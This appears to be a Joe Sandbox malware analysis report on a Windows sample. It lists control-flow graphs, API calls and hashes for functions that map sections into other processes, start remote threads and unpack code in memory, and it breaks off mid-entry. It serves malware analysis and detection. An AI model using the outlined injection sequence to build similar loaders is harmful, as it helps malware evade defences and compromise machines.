                                                                        control_flow_graph 132 4014fe-401503 133 401531-40156e call 401193 132->133 134 401506-401511 132->134 144 401570 133->144 145 401573-401578 133->145 144->145 147 401898-4018a0 145->147 148 40157e-40158f 145->148 147->145 151 4018a5-4018b7 147->151 152 401595-4015be 148->152 153 401896 148->153 158 4018c5 151->158 159 4018bc-4018e3 call 401193 151->159 152->153 162 4015c4-4015db NtDuplicateObject 152->162 153->151 158->159 162->153 164 4015e1-401605 NtCreateSection 162->164 165 401661-401687 NtCreateSection 164->165 166 401607-401628 NtMapViewOfSection 164->166 165->153 170 40168d-401691 165->170 166->165 169 40162a-401646 NtMapViewOfSection 166->169 169->165 172 401648-40165e 169->172 170->153 173 401697-4016b8 NtMapViewOfSection 170->173 172->165 173->153 175 4016be-4016da NtMapViewOfSection 173->175 175->153 177 4016e0 call 4016e5 175->177
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectView
                                                                        • String ID:
                                                                        • API String ID: 1652636561-0
                                                                        • Opcode ID: 304dad40bd57fde4ad2d107e796ee4bd6f67db99f64be0045c1c988ef19b7cdc
                                                                        • Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
                                                                        • Opcode Fuzzy Hash: 304dad40bd57fde4ad2d107e796ee4bd6f67db99f64be0045c1c988ef19b7cdc
                                                                        • Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24
                                                                        Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 179 401542-40156e call 401193 188 401570 179->188 189 401573-401578 179->189 188->189 191 401898-4018a0 189->191 192 40157e-40158f 189->192 191->189 195 4018a5-4018b7 191->195 196 401595-4015be 192->196 197 401896 192->197 202 4018c5 195->202 203 4018bc-4018e3 call 401193 195->203 196->197 206 4015c4-4015db NtDuplicateObject 196->206 197->195 202->203 206->197 208 4015e1-401605 NtCreateSection 206->208 209 401661-401687 NtCreateSection 208->209 210 401607-401628 NtMapViewOfSection 208->210 209->197 214 40168d-401691 209->214 210->209 213 40162a-401646 NtMapViewOfSection 210->213 213->209 216 401648-40165e 213->216 214->197 217 401697-4016b8 NtMapViewOfSection 214->217 216->209 217->197 219 4016be-4016da NtMapViewOfSection 217->219 219->197 221 4016e0 call 4016e5 219->221
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 581fa83bc263e791d9971d53db0324000e8585e44ca574a313370521a86a7cc8
                                                                        • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                        • Opcode Fuzzy Hash: 581fa83bc263e791d9971d53db0324000e8585e44ca574a313370521a86a7cc8
                                                                        • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                                                        Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 223 401549-40156e call 401193 227 401570 223->227 228 401573-401578 223->228 227->228 230 401898-4018a0 228->230 231 40157e-40158f 228->231 230->228 234 4018a5-4018b7 230->234 235 401595-4015be 231->235 236 401896 231->236 241 4018c5 234->241 242 4018bc-4018e3 call 401193 234->242 235->236 245 4015c4-4015db NtDuplicateObject 235->245 236->234 241->242 245->236 247 4015e1-401605 NtCreateSection 245->247 248 401661-401687 NtCreateSection 247->248 249 401607-401628 NtMapViewOfSection 247->249 248->236 253 40168d-401691 248->253 249->248 252 40162a-401646 NtMapViewOfSection 249->252 252->248 255 401648-40165e 252->255 253->236 256 401697-4016b8 NtMapViewOfSection 253->256 255->248 256->236 258 4016be-4016da NtMapViewOfSection 256->258 258->236 260 4016e0 call 4016e5 258->260
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: a43cc433937968852615b5a1196453d78d887ea4f5a0bea8b59419441baeb33d
                                                                        • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                        • Opcode Fuzzy Hash: a43cc433937968852615b5a1196453d78d887ea4f5a0bea8b59419441baeb33d
                                                                        • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                                                        Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 262 401557 263 40155b-40156e call 401193 262->263 264 40154f-401554 262->264 267 401570 263->267 268 401573-401578 263->268 264->263 267->268 270 401898-4018a0 268->270 271 40157e-40158f 268->271 270->268 274 4018a5-4018b7 270->274 275 401595-4015be 271->275 276 401896 271->276 281 4018c5 274->281 282 4018bc-4018e3 call 401193 274->282 275->276 285 4015c4-4015db NtDuplicateObject 275->285 276->274 281->282 285->276 287 4015e1-401605 NtCreateSection 285->287 288 401661-401687 NtCreateSection 287->288 289 401607-401628 NtMapViewOfSection 287->289 288->276 293 40168d-401691 288->293 289->288 292 40162a-401646 NtMapViewOfSection 289->292 292->288 295 401648-40165e 292->295 293->276 296 401697-4016b8 NtMapViewOfSection 293->296 295->288 296->276 298 4016be-4016da NtMapViewOfSection 296->298 298->276 300 4016e0 call 4016e5 298->300
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 29d42f42a6cc8ee6b1305037c54c44870b6144e25efa99f681edebb2ee70e80b
                                                                        • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                        • Opcode Fuzzy Hash: 29d42f42a6cc8ee6b1305037c54c44870b6144e25efa99f681edebb2ee70e80b
                                                                        • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                                                        Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 168nativethreadCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 302 402f97-402fbb 303 402fc1-402fd9 302->303 304 4030ee-4030f3 302->304 303->304 305 402fdf-402ff0 303->305 306 402ff2-402ffb 305->306 307 403000-40300e 306->307 307->307 308 403010-403017 307->308 309 403039-403040 308->309 310 403019-403038 308->310 311 403062-403065 309->311 312 403042-403061 309->312 310->309 313 403067-40306a 311->313 314 40306e 311->314 312->311 313->314 315 40306c 313->315 314->306 316 403070-403075 314->316 315->316 316->304 317 403077-40307a 316->317 317->304 318 40307c-4030eb RtlCreateUserThread NtTerminateProcess 317->318 318->304
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: CreateProcessTerminateThreadUser
                                                                        • String ID:
                                                                        • API String ID: 1921587553-0
                                                                        • Opcode ID: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction ID: 1591ba869369ea84e79847af2efd18b9bf5795e6c00b1d775a4c0b4e714efbc4
                                                                        • Opcode Fuzzy Hash: 8dd8c1b6c2a2e81b31e5df05537a0a765b57e58f23bcff5050bac5d1a8738f05
                                                                        • Instruction Fuzzy Hash: FD414531218E0C4FD7A8EF6CA88576277D5F798311F6643AAE809D3389EA74DC1183C5
                                                                        Function 0266F92E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 319 266f92e-266f947 320 266f949-266f94b 319->320 321 266f952-266f95e CreateToolhelp32Snapshot 320->321 322 266f94d 320->322 323 266f960-266f966 321->323 324 266f96e-266f97b Module32First 321->324 322->321 323->324 329 266f968-266f96c 323->329 325 266f984-266f98c 324->325 326 266f97d-266f97e call 266f5ed 324->326 330 266f983 326->330 329->320 329->324 330->325
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0266F956
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 0266F976
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_265d000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 0b2ada269ea223d22982d5b2df2f3f281c1e66e2d875bd8bd91b8f95e1d93372
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: 7AF062315007117BE7203AB9AC8DB7EB6E8AF49729F100628E653919C0DB70E8454A65
                                                                        Function 0260003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 260003c-2600047 1 2600049 0->1 2 260004c-2600263 call 2600a3f call 2600e0f call 2600d90 VirtualAlloc 0->2 1->2 17 2600265-2600289 call 2600a69 2->17 18 260028b-2600292 2->18 22 26002ce-26003c2 VirtualProtect call 2600cce call 2600ce7 17->22 19 26002a1-26002b0 18->19 21 26002b2-26002cc 19->21 19->22 21->19 29 26003d1-26003e0 22->29 30 26003e2-2600437 call 2600ce7 29->30 31 2600439-26004b8 VirtualFree 29->31 30->29 33 26005f4-26005fe 31->33 34 26004be-26004cd 31->34 36 2600604-260060d 33->36 37 260077f-2600789 33->37 35 26004d3-26004dd 34->35 35->33 39 26004e3-2600505 35->39 36->37 42 2600613-2600637 36->42 40 26007a6-26007b0 37->40 41 260078b-26007a3 37->41 51 2600517-2600520 39->51 52 2600507-2600515 39->52 44 26007b6-26007cb 40->44 45 260086e-26008be LoadLibraryA 40->45 41->40 46 260063e-2600648 42->46 48 26007d2-26007d5 44->48 50 26008c7-26008f9 45->50 46->37 49 260064e-260065a 46->49 53 2600824-2600833 48->53 54 26007d7-26007e0 48->54 49->37 55 2600660-260066a 49->55 56 2600902-260091d 50->56 57 26008fb-2600901 50->57 58 2600526-2600547 51->58 52->58 62 2600839-260083c 53->62 59 26007e2 54->59 60 26007e4-2600822 54->60 61 260067a-2600689 55->61 57->56 63 260054d-2600550 58->63 59->53 60->48 64 2600750-260077a 61->64 65 260068f-26006b2 61->65 62->45 66 260083e-2600847 62->66 68 26005e0-26005ef 63->68 69 2600556-260056b 63->69 64->46 70 26006b4-26006ed 65->70 71 26006ef-26006fc 65->71 72 2600849 66->72 73 260084b-260086c 66->73 68->35 74 260056d 69->74 75 260056f-260057a 69->75 70->71 76 260074b 71->76 77 26006fe-2600748 71->77 72->45 73->62 74->68 79 260059b-26005bb 75->79 80 260057c-2600599 75->80 76->61 77->76 84 26005bd-26005db 79->84 80->84 84->63
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0260024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2600000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 38970583c4b0d8f2029b469f18cb552b7e2e82059de27bbee9bf2002265f9962
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: ED525974A01229DFDB64CF58C984BADBBB1BF09304F1480E9E54DAB391DB30AA95DF14
                                                                        Function 02600E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 332 2600e0f-2600e24 SetErrorMode * 2 333 2600e26 332->333 334 2600e2b-2600e2c 332->334 333->334
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02600223,?,?), ref: 02600E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02600223,?,?), ref: 02600E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2600000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: f82a6827768bfc8aed8dcca7ece3f46dddec10a89304653ab261c17e36a96948
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: 47D01232245228B7DB002A94DC09BCEBB1CDF09BA6F008021FB0DE9180CBB09A4046EA
                                                                        Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                                                        Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                                                        Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                        Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                        Function 0266F5ED Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 444 266f5ed-266f627 call 266f900 447 266f675 444->447 448 266f629-266f65c VirtualAlloc call 266f67a 444->448 447->447 450 266f661-266f673 448->450 450->447
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 0266F63E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2139720397.000000000265D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0265D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_265d000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: aaf5384a9d92f80ddcc842b19c0128b865dc0431bfab558092ae0f6cd05aabbd
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 54113C79A00208FFDB01DF98C989E99BBF5AF08350F158094F9489B362D371EA50DF84
                                                                        Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2137259113.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_KTh1gQlT9a.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                        Non-executed Functions

                                                                        Function 0260092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2138650769.0000000002600000.00000040.00001000.00020000.00000000.sdmp, Offset: 02600000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_2600000_KTh1gQlT9a.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$GetProcAddress.$l
                                                                        • API String ID: 0-2784972518
                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                        • Instruction ID: 6c2e33039f4a18cdb58a5b6cd42b64b2e40d5b1acf6e1a485a5379bd2d5cfe67
